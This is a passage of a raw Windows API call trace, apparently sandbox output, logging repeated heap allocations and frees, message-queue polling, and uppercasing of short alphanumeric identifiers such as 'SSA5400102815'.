RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0163.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0163.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.618] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.619] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0163.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0163.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0163.622] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0163.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.622] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.623] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.623] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0163.623] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.624] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.625] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.626] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.626] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.626] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.626] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.627] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.627] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: 